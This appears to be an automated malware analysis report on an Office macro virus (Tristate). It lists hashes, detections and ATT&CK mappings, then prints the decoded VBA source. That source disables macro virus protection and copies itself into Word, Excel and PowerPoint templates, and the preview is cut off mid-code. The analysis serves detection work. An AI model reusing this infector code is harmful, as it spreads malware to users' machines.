Win.Trojan.Tristate-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 642b54d677d4d412…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 18.5 KB
Created: 1601-01-01 00:00:00
Authoring application: Microsoft PowerPoint
First seen: 2012-06-14
MD5: 72be6ecab95387ab33c25de2bcdc23aa
SHA-1: e03792905c3c0f8aa98ba6077afc7b3a53b3d808
SHA-256: 642b54d677d4d412fc86d81b2c010f7f7b6663d463bdd63eaafc991d32761f7d
Risk score: 220

Malware Insights

Win.Trojan.Tristate-2 · confidence 90%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

ClamAV identifies the sample as malicious with the signature Win.Trojan.Tristate-2. The document contains VBA macros that use CreateObject and GetObject, which is indicative of malicious activity. The macro code manipulates Office templates and may download additional payloads; the truncated Excel object creation and file manipulation code suggests this.

Heuristics (4)

  • ClamAV: Win.Trojan.Tristate-2 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Win.Trojan.Tristate-2
  • VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]
    Document contains VBA macro code
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    CreateObject call
  • GetObject call [high, OLE_VBA_GETOBJ]
    GetObject call

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10393 bytes
SHA-256: 14157d4982ca0b618c650f983bf47e171a5fa9077a60e379e07c0e843ae2f59d
Detection: ClamAV: Win.Trojan.Insert-9
Obfuscation or payload: unlikely

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Предложение"
'<!--Прога-->
'Предложение v0.01 /Прога
Private Sub Document_Close() ' Word
    On Error Resume Next
    MsgBox "ООО ""Курскметалл""" & Chr(13) & "Закупает лом чёрных металлов." & Chr(13) & "Цены приемлемые." & Chr(13) & "Наш адрес: пр. Кулакова 109-а, тел./факс (0712) 32-00-42": Options.VirusProtection = False
    Options.ConfirmConversions = False
    Options.SaveNormalPrompt = False
    Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If AD.Lines(1, 1) <> "'<!--Прога-->" Then
        AD.deletelines 1, AD.CountOfLines
        AD.InsertLines 1, TT.Lines(1, TT.CountOfLines)
        If AD.Lines(1, 1) <> "'<!--Прога-->" Then
            AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
        End If
    End If
    If NT.Lines(1, 1) <> "'<!--Прога-->" Then
        NT.deletelines 1, NT.CountOfLines
        NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
        Set xlApp = CreateObject("Excel.Application")
        If UCase(Dir(xlApp.Application.StartupPath + "\Вторсырье.")) <> UCase("ВТОРСЫРЬЕ") Then
            'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Check"
            'System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
            'System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Whoa"
            Set Book1Obj = xlApp.Workbooks.Add
            Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
            Book1Obj.SaveAs xlApp.Application.StartupPath & "\Вторсырье."
            Book1Obj.Close
        End If
        xlApp.Quit
        Set PPObj = CreateObject("PowerPoint.Application")
        Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
        For Each ModComponent In PBT.VBProject.VBComponents
            If ModComponent.Name = "Предложение" Then dontadd = True
        Next
        If dontadd <> True Then
            'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
            'System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\PowerPoint\Options", "MacroVirusProtection") = ""
            'System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
            Set NewMod = PBT.VBProject.VBComponents.Add(1)
            NewMod.Name = "Предложение"
            NewMod.CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
            NewMod.CodeModule.ReplaceLine 118, "Sub actionhook(tristate)"
            Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
            With ShapetoWack
                .Name = "Предложение"
                .ZOrder (1)
                .Line.Visible = False
                .Fill.Visible = False
                .ActionSettings(1).Action = 8
                .ActionSettings(1).Run = "actionhook"
            End With
            Set NewMod = Nothing
            PBT.Save
        End If
        PBT.Close
        PPObj.Quit
    End If
    If TT.Lines(1, 1) <> "'<!--Прога-->" Then
        TT.deletelines 1, TT.CountOfLines
        TT.InsertLines 1, NT.Lines(1, NT.CountOfLines)
    End If
End Sub
Private Sub Workbook_Deactivate() 'Excel
    MsgBox "ООО ""Курскметалл""" & Chr(13) & "Закупает лом чёрных металлов." & Chr(13) & "Цены приемлемые." & Chr(13) & "Наш адрес: пр. Кулакова 109-а, тел./факс (0712) 32-00-42":    On Error Resume Next
    Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
    Set TW = ThisWorkbook.VBProject.VBComponents("
... (truncated)